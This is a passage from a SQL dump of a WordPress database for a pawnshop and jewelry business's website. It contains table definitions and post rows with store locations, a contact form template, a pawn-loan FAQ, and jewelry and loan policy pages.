Jesse_Kody\";s:12:\"focal_length\";s:2:\"20\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:3:\"0.3\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(495,273,'_wp_attached_file','2015/03/all-that-glitters-25-years.png'),(496,273,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:517;s:6:\"height\";i:161;s:4:\"file\";s:38:\"2015/03/all-that-glitters-25-years.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"all-that-glitters-25-years-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"all-that-glitters-25-years-300x93.png\";s:5:\"width\";i:300;s:6:\"height\";i:93;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"all-that-glitters-25-years-90x90.png\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:38:\"all-that-glitters-25-years-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:38:\"all-that-glitters-25-years-300x161.png\";s:5:\"width\";i:300;s:6:\"height\";i:161;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:38:\"all-that-glitters-25-years-200x150.png\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:37:\"all-that-glitters-25-years-100x30.png\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(497,273,'_wp_attachment_image_alt','All that glitters, jewelry and loans'); /*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_posts` -- DROP TABLE IF EXISTS `wp_posts`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_posts` ( `ID` bigint(20) unsigned NOT NULL auto_increment, `post_author` bigint(20) unsigned NOT NULL default '0', `post_date` datetime NOT NULL default '0000-00-00 00:00:00', `post_date_gmt` datetime NOT NULL default '0000-00-00 00:00:00', `post_content` longtext NOT NULL, `post_title` text NOT NULL, `post_excerpt` text NOT NULL, `post_status` varchar(20) NOT NULL default 'publish', `comment_status` varchar(20) NOT NULL default 'open', `ping_status` varchar(20) NOT NULL default 'open', `post_password` varchar(20) NOT NULL default '', `post_name` varchar(200) NOT NULL default '', `to_ping` text NOT NULL, `pinged` text NOT NULL, `post_modified` datetime NOT NULL default '0000-00-00 00:00:00', `post_modified_gmt` datetime NOT NULL default '0000-00-00 00:00:00', `post_content_filtered` longtext NOT NULL, `post_parent` bigint(20) unsigned NOT NULL default '0', `guid` varchar(255) NOT NULL default '', `menu_order` int(11) NOT NULL default '0', `post_type` varchar(20) NOT NULL default 'post', `post_mime_type` varchar(100) NOT NULL default '', `comment_count` bigint(20) NOT NULL default '0', PRIMARY KEY (`ID`), KEY `post_name` (`post_name`), KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`), KEY `post_parent` (`post_parent`), KEY `post_author` (`post_author`) ) ENGINE=MyISAM AUTO_INCREMENT=276 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_posts` -- LOCK TABLES `wp_posts` WRITE; /*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */; INSERT INTO `wp_posts` VALUES (1,1,'2014-08-13 15:26:49','2014-08-13 15:26:49','Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!','Hello world!','','publish','open','open','','hello-world','','','2014-08-13 15:26:49','2014-08-13 15:26:49','',0,'http://atgjewelry.com/fuze7/?p=1',0,'post','',1),(2,1,'2014-08-13 15:26:49','2014-08-13 15:26:49','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\r\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my blog. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)</blockquote>\r\n...or something like this:\r\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\r\nAs a new WordPress user, you should go to <a href=\"http://atgjewelry.com/fuze7/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!','Sample Page','','draft','open','open','','sample-page','','','2015-02-23 18:55:22','2015-02-24 02:55:22','',0,'http://atgjewelry.com/fuze7/?page_id=2',0,'page','',0),(84,2,'2015-02-15 14:24:32','2015-02-15 22:24:32','','Division_inside-2','','inherit','open','open','','division_inside-2','','','2015-02-15 14:24:32','2015-02-15 22:24:32','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2.jpg',0,'attachment','image/jpeg',0),(7,1,'2015-02-07 18:46:12','2015-02-07 18:46:12','[woocommerce_cart]','Cart','','draft','closed','closed','','cart','','','2015-02-10 20:56:22','2015-02-10 20:56:22','',0,'http://atgjewelry.com/fuze7/?page_id=7',0,'page','',0),(8,1,'2015-02-07 18:46:12','2015-02-07 18:46:12','[woocommerce_checkout]','Checkout','','draft','closed','closed','','checkout','','','2015-02-10 20:56:13','2015-02-10 20:56:13','',0,'http://atgjewelry.com/fuze7/?page_id=8',0,'page','',0),(6,1,'2015-02-07 18:46:12','2015-02-07 18:46:12','Lorem ipsum','Shop','','draft','closed','closed','','shop','','','2015-02-10 20:56:00','2015-02-10 20:56:00','',0,'http://atgjewelry.com/fuze7/?page_id=6',0,'page','',0),(9,1,'2015-02-07 18:46:12','2015-02-07 18:46:12','[woocommerce_my_account]','My Account','','draft','closed','closed','','my-account','','','2015-02-10 20:56:35','2015-02-10 20:56:35','',0,'http://atgjewelry.com/fuze7/?page_id=9',0,'page','',0),(10,1,'2015-02-07 18:47:16','2015-02-07 18:47:16','<table>\r\n<tr><td>Name</td><td> [text* your-name] *</td></tr>\r\n\r\n<tr><td>Email</td><td>[email* your-email] *</td></tr>\r\n\r\n<tr><td>Subject</td><td>[text* your-subject] *</td></tr>\r\n\r\n<tr><td>Message</td><td>[textarea* your-message] *</td></tr>\r\n\r\n<tr><td>Security Code</td><td>[captchac captcha]</td></tr>\r\n<tr><td>Retype Code</td><td>[captchar captcha]</td></tr>\r\n<tr><td></td><td>[submit \"Send\"]</td></tr>\r\n</table>\n[your-subject]\n[your-name] <wordpress@atgjewelry.com>\nFrom: [your-name] <[your-email]>\r\nSubject: [your-subject]\r\n\r\nMessage Body:\r\n[your-message]\r\n\r\n--\r\nThis e-mail was sent from a contact form on fuze7 (http://atgjewelry.com/fuze7)\ndiane@fuze7.com\nReply-To: [your-email]\n\n1\n\n\n[your-subject]\nfuze7 <wordpress@atgjewelry.com>\nMessage Body:\r\n[your-message]\r\n\r\n--\r\nThis e-mail was sent from a contact form on fuze7 (http://atgjewelry.com/fuze7)\n[your-email]\nReply-To: daniel@tualatinweb.com\n\n\n\nYour message was sent successfully. Thanks.\nFailed to send your message. Please try later or contact the administrator by another method.\nValidation errors occurred. Please confirm the fields and submit it again.\nFailed to send your message. Please try later or contact the administrator by another method.\nPlease accept the terms to proceed.\nPlease fill in the required field.\nThis input is too long.\nThis input is too short.\nYour entered code is incorrect.\nNumber format seems invalid.\nThis number is too small.\nThis number is too large.\nEmail address seems invalid.\nURL seems invalid.\nTelephone number seems invalid.\nYour answer is not correct.\nDate format seems invalid.\nThis date is too early.\nThis date is too late.\nFailed to upload file.\nThis file type is not allowed.\nThis file is too large.\nFailed to upload file. Error occurred.','Contact','','publish','open','open','','contact-form-1','','','2015-03-09 14:15:54','2015-03-09 21:15:54','',0,'http://atgjewelry.com/fuze7/?post_type=wpcf7_contact_form&p=10',0,'wpcf7_contact_form','',0),(70,1,'2015-02-12 18:38:18','2015-02-12 18:38:18','','Clear Watch','','trash','closed','closed','','clear-watch','','','2015-03-09 19:28:29','2015-03-10 02:28:29','',0,'http://atgjewelry.com/fuze7/?post_type=slider&p=70',0,'slider','',0),(30,1,'2015-02-08 02:08:45','2015-02-08 02:08:45','','All-that-glitters-jewelery-and-loands','','inherit','open','open','','all-that-glitters-jewelery-and-loands-2','','','2015-02-08 02:08:45','2015-02-08 02:08:45','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/All-that-glitters-jewelery-and-loands.png',0,'attachment','image/png',0),(13,1,'2015-02-07 18:58:00','2015-02-07 18:58:00',' ','','','publish','open','open','','13','','','2015-02-07 18:58:00','2015-02-07 18:58:00','',0,'http://atgjewelry.com/fuze7/?p=13',3,'nav_menu_item','',0),(14,1,'2015-02-07 18:58:00','2015-02-07 18:58:00',' ','','','publish','open','open','','14','','','2015-02-07 18:58:00','2015-02-07 18:58:00','',0,'http://atgjewelry.com/fuze7/?p=14',2,'nav_menu_item','',0),(15,1,'2015-02-07 18:58:00','2015-02-07 18:58:00',' ','','','publish','open','open','','15','','','2015-02-07 18:58:00','2015-02-07 18:58:00','',0,'http://atgjewelry.com/fuze7/?p=15',1,'nav_menu_item','',0),(16,1,'2015-02-07 19:01:54','0000-00-00 00:00:00','','Body Background','','draft','closed','closed','','of-body_background','','','2015-02-07 19:01:54','0000-00-00 00:00:00','',0,'http://atgjewelry.com/fuze7/?post_type=optionsframework&p=16',0,'optionsframework','',0),(17,1,'2015-02-07 19:01:54','0000-00-00 00:00:00','','Header Background','','draft','closed','closed','','of-header_background','','','2015-02-07 19:01:54','0000-00-00 00:00:00','',0,'http://atgjewelry.com/fuze7/?post_type=optionsframework&p=17',0,'optionsframework','',0),(18,1,'2015-02-07 19:01:54','0000-00-00 00:00:00','','Logo Url','','draft','closed','closed','','of-logo_url','','','2015-02-07 19:01:54','0000-00-00 00:00:00','',0,'http://atgjewelry.com/fuze7/?post_type=optionsframework&p=18',0,'optionsframework','',0),(19,1,'2015-02-07 19:01:54','0000-00-00 00:00:00','','Favicon','','draft','closed','closed','','of-favicon','','','2015-02-07 19:01:54','0000-00-00 00:00:00','',0,'http://atgjewelry.com/fuze7/?post_type=optionsframework&p=19',0,'optionsframework','',0),(83,2,'2015-02-15 15:22:49','2015-02-15 23:22:49','<h1 style=\"text-align: center;\"><strong>5 Oregon Locations, Open 7 Days a Week!</strong></h1>\r\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\r\n<strong>N. PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside.jpg\"><img class=\"alignnone wp-image-154 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside-300x215.jpg\" alt=\"Lombard, All that Glitters\" width=\"300\" height=\"215\" /></a>\r\n\r\n[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/North-Lombard.jpg\"><img class=\"alignnone size-medium wp-image-248\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/North-Lombard-300x215.jpg\" alt=\"North Lombard store, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2792.6752415075734!2d-122.6973386!3d45.576969!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a7bc5175458b%3A0x6a338a6c83521185!2s2932+N+Lombard+St%2C+Portland%2C+OR+97217!5e0!3m2!1sen!2sus!4v1424971890870\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>\r\n[span4]\r\n\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside.jpg\"><img class=\"alignnone wp-image-157 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside-300x221.jpg\" alt=\"Division, all that glitters\" width=\"300\" height=\"221\" /></a>[/span4]\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside.jpg\"><img class=\"alignnone wp-image-158 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside-300x215.jpg\" alt=\"Division inside, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2796.308567804789!2d-122.53730759999999!3d45.503866699999996!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a1c202f16d99%3A0xd11d950ef929fd57!2s12200+SE+Division+St%2C+Portland%2C+OR+97236!5e0!3m2!1sen!2sus!4v1424972011050\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168</strong>\r\n[span4]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1.jpg\"><img class=\"alignnone size-medium wp-image-162\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1-300x215.jpg\" alt=\"Milwaukie, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1.jpg\"><img class=\"alignnone size-medium wp-image-163\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1-300x215.jpg\" alt=\"Milwaukie, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.7774589673077!2d-122.62954599999999!3d45.413827!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495745ed4b97ea3%3A0x718f1732179ebc6e!2s15114+SE+McLoughlin+Blvd%2C+Portland%2C+OR+97267!5e0!3m2!1sen!2sus!4v1424972438719\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-outside.jpg\"><img class=\"alignnone size-medium wp-image-165\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-outside-300x215.jpg\" alt=\"Tigard, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-inside.jpg\"><img class=\"alignnone size-medium wp-image-166\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-inside-300x215.jpg\" alt=\"Tigard, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.122881897304!2d-122.7771537!3d45.427024200000005!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54950d2478b9878b%3A0x8606ae6c36002c06!2s12760+SW+Pacific+Hwy%2C+Tigard%2C+OR+97223!5e0!3m2!1sen!2sus!4v1424972494023\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-outside.jpg\"><img class=\"alignnone size-medium wp-image-169\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-outside-300x215.jpg\" alt=\"Salem, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-inside.jpg\"><img class=\"alignnone size-medium wp-image-168\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-inside-300x215.jpg\" alt=\"Salem, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2823.9331948345302!2d-122.98391!3d44.945026!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54bffec2370440b3%3A0x851994b509c59f4b!2s1191+Lancaster+Dr+NE%2C+Salem%2C+OR+97301!5e0!3m2!1sen!2sus!4v1424972552736\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]','Locations','','publish','closed','open','','locations','','','2015-03-10 17:29:55','2015-03-11 00:29:55','',31,'http://atgjewelry.com/fuze7/?page_id=83',0,'page','',0),(21,1,'2015-02-08 00:40:18','2015-02-08 00:40:18','','Shop','','inherit','open','open','','6-revision-v1','','','2015-02-08 00:40:18','2015-02-08 00:40:18','',6,'http://atgjewelry.com/fuze7/6-revision-v1/',0,'revision','',0),(22,1,'2015-02-08 00:41:00','2015-02-08 00:41:00','Lorem ipsum','Shop','','inherit','open','open','','6-revision-v1','','','2015-02-08 00:41:00','2015-02-08 00:41:00','',6,'http://atgjewelry.com/fuze7/6-revision-v1/',0,'revision','',0),(23,1,'2015-02-08 00:42:54','2015-02-08 00:42:54','','All-that-glitters-jewelery-and-loands','','inherit','open','open','','all-that-glitters-jewelery-and-loands','','','2015-02-08 00:43:11','2015-02-08 00:43:11','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/All-that-glitters-jewelery-and-loands.jpg',0,'attachment','image/jpeg',0),(151,1,'2015-03-09 12:44:46','2015-03-09 19:44:46','','ATG_dark-bgrd','','inherit','open','open','','atg_dark-bgrd','','','2015-03-09 12:44:59','2015-03-09 19:44:59','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/ATG_dark-bgrd.png',0,'attachment','image/png',0),(123,2,'2015-02-23 19:12:03','2015-02-24 03:12:03','<div class=\"home-content-area\">\r\n<h3>Layaway Policy</h3>\r\nA pawn is a collateral loan. A pawnbroker is one who lends money while holding an item of value as collateral.\r\n<h3>What if I don\'t want to Pawn my item? Will you buy outright?</h3>\r\nWe will purchase any item we would loan on. Usually, for the same amount.\r\n<h3>What do I need to get a loan?</h3>\r\nA state issued drivers license or ID card from any state is required. If you have an out of state ID card, you must present a second piece of ID. By law, we can not take anything from you without ID. *You must be 18 years of age or older to take out a loan.\r\n<h3>Is my transaction confidential?</h3>\r\nAbsolutely, we respect your privacy. All transaction & personal information collected is confidential. See our \"Privacy Policy\".\r\n<h3>Am I guaranteed to get my item back when I repay the loan?</h3>\r\nAbsolutely! As long as you return while the loan is active your property is safely stored. Your pledge will be sold ONLY if you do not return for it within your loan period.\r\n<h3>My loan slip says Bearer Contract, what does that mean?</h3>\r\nIn the state of Oregon, pawn slips are \"Bearer Contracts\". This means that whomever is in possession of your pink slip is considered the owner of your items. We recommend you keep it in a safe.\r\n<h3>Can I get more money later?</h3>\r\nOnce a pawn loan is written, we can not change the amount. If we are able to loan a higher amount you can redeem your item, we may write a new loan for the higher amount.\r\n<h3>I lost my ticket....what now?</h3>\r\nBring in the Identification used to take out your loan (Driver\'s license or ID) & you may redeem your item. There is a $3.00 fee for lost contracts.\r\n<h3>What happens if I don\'t come back for my item?</h3>\r\nIf you don\'t repay the loan, after 90 days (60 days if renewed) the pawned item(s) becomes the property of ATG.\r\n<h3>Can I get my items if it\'s past the due date?</h3>\r\nRest assured, we want everyone to have their property. If the item(s) is still on premises when you arrive, you can buy it back from us. If the item(s) have left the premises, unfortunately, at that point they are unable to be reclaimed.\r\n<h3>Do you offer Layaway?</h3>\r\nWe are pleased to offer \"Interest-Free Layaways\". With just 20% down you can put any item in the store on Layaway for up to 90 days.\r\n<h3>Why buy from us?</h3>\r\nATG is an established, licensed, bonded & insured business with a reputation to maintain. Our industry is closely regulated & monitored. Every single item that passes through our store is not only examined for function & serviceability, it also has its model & serial numbers reported to our local police departments to check against the police databases. This should reassure you. After all, what other store can guarantee that their merchandise has been screened in this way? Why buy second-hand? Our stores offer a great opportunity to purchase items at a reduced price. We offer a 30-day functional warranty on non-jewelry items. Our jewelry is guaranteed & comes with a lifetime stone replacement warranty. See our Sales Policies here.\r\n<h3>How do I know it\'s not stolen?</h3>\r\nQuoted: \"Nationally less than one (1%) percent of all loans are stolen, of those a good 80% are family related. Over 78,000 people are employed in the industry, which contributes 1.6 billion dollars in salaries to the nation\'s economy. Approximately 303 million dollars in sales & property taxes are contributed by the industry. Capital investments of over 9 billion dollars are from the Pawn industry. There are over 34 million customers served yearly by pawnshops.\"\r\n\r\nIn conclusion, there is a great deal of misunderstanding concerning the pawn business. It is a business that combines retail sales with old fashioned banking & serves a clientele that includes all income brackets. Those involved work diligently toward keeping their business legal as well as serving a needed purpose in the community of loaning to those whom the banks will never acknowledge.\r\n\r\n</div>\r\n<div id=\"footer\"></div>\r\n ','FAQ\'s','','inherit','open','open','','120-revision-v1','','','2015-02-23 19:12:03','2015-02-24 03:12:03','',120,'http://atgjewelry.com/fuze7/120-revision-v1/',0,'revision','',0),(27,1,'2015-02-08 01:00:47','2015-02-08 09:00:47','[row_fluid]\r\n[one_half]\r\nFill out this form to contact us, then we will reply by email:\r\n[contact-form-7 id=\"176\" title=\"fuze7\"]\r\n<h2>Locations</h2>\r\n<strong>S.E. PORTLAND</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE DIVISION</a>\r\n503-761-9699\r\n\r\n<strong>N. PORTLAND</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. LOMBARD</a>\r\n503-247-1019\r\n\r\n<strong>TIGARD</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW PACIFIC HWY</a>\r\n503-968-9510\r\n\r\n<strong>MILWAUKIE</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE MCLOUGHLIN</a>\r\n503-785-1168\r\n\r\n<strong>SALEM</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 LANCASTER DR NE</a>\r\n503-362-9939\r\n[/one_half]\r\n[one_half]<iframe src=\"https://www.google.com/maps/d/embed?mid=z4fRDBnmLvwA.ksG2JCjZpLY8&hl=en\" width=\"480\" height=\"480\"></iframe>[/one_half]\r\n[/row_fluid]','Contact','','publish','closed','open','','contact','','','2015-03-09 14:18:05','2015-03-09 21:18:05','',31,'http://atgjewelry.com/fuze7/?page_id=27',0,'page','',0),(28,1,'2015-02-08 01:00:47','2015-02-08 01:00:47','<iframe src=\"https://www.google.com/maps/d/embed?mid=z4fRDBnmLvwA.ksG2JCjZpLY8&hl=en\" width=\"640\" height=\"480\"></iframe>','Contact','','inherit','open','open','','27-revision-v1','','','2015-02-08 01:00:47','2015-02-08 01:00:47','',27,'http://atgjewelry.com/fuze7/27-revision-v1/',0,'revision','',0),(124,2,'2015-02-23 19:13:43','2015-02-24 03:13:43','Buying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\r\n\r\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\r\n\r\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\r\n\r\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\r\n\r\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipt, come in to one of our five locations, and select a piece valued at $50.00 more than your last one. Be sure you bring in an original receipt in your name. That\'s all there is to it.\r\n\r\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us. Just bring in an original purchase receipt that\'s in your name.','Jewelry','','inherit','open','open','','39-revision-v1','','','2015-02-23 19:13:43','2015-02-24 03:13:43','',39,'http://atgjewelry.com/fuze7/39-revision-v1/',0,'revision','',0),(31,2,'2015-02-08 20:47:04','2015-02-09 04:47:04','All That Glitters is a family-owned and operated business serving Oregon\'s Pacific Northwest for more than 25 years. We are a member of the National Pawnbroker\'s Association, and active members of the Oregon Pawnbrokers Association.\r\n\r\nOur goal is to ensure that every customer is treated in the friendliest and fairest way possible. We do this by offering lifetime stone replacement policies and an excellent trade up policy on all of our jewelry. We offer wholesale prices every day with discounts starting at 50% off of Retail Prices on nearly all the jewelry we sell. All other merchandise is researched and priced with you in mind. We want to sell it, we don\'t want to keep it!\r\n\r\nAll That Glitters is an established, licensed, bonded and insured business with a reputation to maintain. Our goal is to change the way you view Pawnshops by providing you with as close to a retail experience as we can, while keeping our prices at wholesale level or below.','About Company','','publish','closed','closed','','about','','','2015-03-09 14:43:09','2015-03-09 21:43:09','',0,'http://atgjewelry.com/fuze7/?page_id=31',0,'page','',0),(32,2,'2015-02-08 20:46:26','2015-02-08 20:46:26','','About Company','','inherit','open','open','','31-revision-v1','','','2015-02-08 20:46:26','2015-02-08 20:46:26','',31,'http://atgjewelry.com/fuze7/31-revision-v1/',0,'revision','',0),(33,2,'2015-02-08 20:47:04','2015-02-08 20:47:04','All That Glitters is a family owned and operated business serving Oregon\'s Pacific Northwest for more than 25 years. We are a member of the National Pawnbroker\'s Association, and active members of the Oregon Pawnbrokers Association.\r\n\r\nOur goal is to ensure that every customer is treated in the friendliest and fairest way possible. We do this by offering lifetime stone replacement policies as well as an excellent trade up policy on all of our jewelry. We offer wholesale prices every day with discounts starting at 50% off of Retail Prices on nearly all the jewelry we sell. All other merchandise is researched and priced with you in mind. We want to sell it, we don\'t want to keep it!\r\n\r\nAll That Glitters is an established, licensed, bonded and insured business with a reputation to maintain. Our goal is to change the way you view Pawnshops. By providing you with as close to a retail experience as we can, while keeping our prices at wholesale level or below.\r\n\r\n<img src=\"http://atgjewelry.com/images/about-bottam.png\" alt=\"\" />','About Company','','inherit','open','open','','31-revision-v1','','','2015-02-08 20:47:04','2015-02-08 20:47:04','',31,'http://atgjewelry.com/fuze7/31-revision-v1/',0,'revision','',0),(34,2,'2015-02-08 21:35:57','2015-02-08 21:35:57','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n \r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% re-sellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n \r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong></div>\r\n<div class=\"loans-left\"></div>\r\n<img class=\"alignleft wp-image-217 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--1024x683.jpg\" alt=\"Electric Guitar\" width=\"604\" height=\"403\" />\r\n[/one_half]\r\n[one_half]\r\n\r\n<strong>Loan 